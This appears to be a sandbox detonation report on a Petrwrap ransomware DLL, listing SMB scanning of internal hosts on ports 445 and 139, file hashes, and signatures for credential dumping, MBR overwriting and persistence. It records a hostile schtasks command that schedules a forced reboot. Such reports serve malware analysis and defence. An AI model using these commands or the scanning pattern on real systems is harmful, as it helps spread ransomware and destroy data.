N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.53:139 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.56:139 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.57:139 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.58:139 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.59:139 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.63:139 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.65:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.71:139 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.78:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.79:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.1.85:139 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.89:139 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.90:139 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.91:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.92:139 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.93:139 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.94:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.95:139 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.96:139 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.97:139 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.1.98:139 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.99:139 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.100:139 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.1.101:139 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.102:139 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.103:139 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.104:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.105:139 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.106:139 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.107:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.108:139 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.109:139 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.110:139 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.1.111:139 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.112:139 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.113:139 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.1.114:139 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.115:139 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.116:139 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.117:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.118:139 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.119:139 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.120:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.121:139 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.122:139 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.123:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.124:139 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.125:139 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.126:139 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.1.127:139 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.128:139 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.129:139 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.130:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.131:139 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.132:139 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.133:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.134:139 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.135:139 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.136:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.137:139 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.138:139 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.139:139 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.1.140:139 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.141:139 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.142:139 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.1.143:139 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.144:139 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.145:139 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.146:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.147:139 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.148:139 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.149:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.150:139 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.151:139 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.152:139 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.1.153:139 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.154:139 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.155:139 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.1.156:139 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.157:139 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.158:139 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.159:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.160:139 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.161:139 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.162:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.163:139 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.164:139 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.165:139 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.1.166:139 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.167:139 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.168:139 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.1.169:139 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.170:139 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.171:139 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.1.172:139 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.173:139 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.174:139 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.175:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.176:139 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.177:139 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.178:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.179:139 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.180:139 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.181:139 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.1.182:139 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.183:139 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.184:139 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.1.185:139 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.186:139 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.187:139 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.188:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.189:139 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.190:139 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.191:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.1.192:445 tcp

Files

memory/1144-0-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-8-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-11-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-23-0x00000000001C0000-0x000000000021E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\202E.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/1144-9-0x00000000001C0000-0x000000000021E000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1807s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\56AB.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\56AB.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\56AB.tmp

"C:\Users\Admin\AppData\Local\Temp\56AB.tmp" \\.\pipe\{BE829EEB-6C2A-49B3-89FF-523499492D5F}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.55:139 tcp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:445 tcp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.62:445 tcp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.67:139 tcp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.13:445 tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:445 tcp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:445 tcp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
N/A 10.127.0.17:445 tcp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:445 tcp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.82:445 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
N/A 10.127.0.21:139 tcp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.29:445 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.33:445 tcp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
N/A 10.127.0.103:445 tcp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.37:445 tcp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
N/A 10.127.0.37:139 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.41:445 tcp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.116:139 tcp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.45:445 tcp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
N/A 10.127.0.123:445 tcp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.47:445 tcp
US 20.189.173.16:445 self.events.data.microsoft.com tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:139 tcp
US 20.189.173.16:139 self.events.data.microsoft.com tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.128:139 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.48:445 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.135:445 tcp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.52:445 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.55:445 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.56:445 tcp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.59:139 tcp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.60:445 tcp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.60:139 tcp
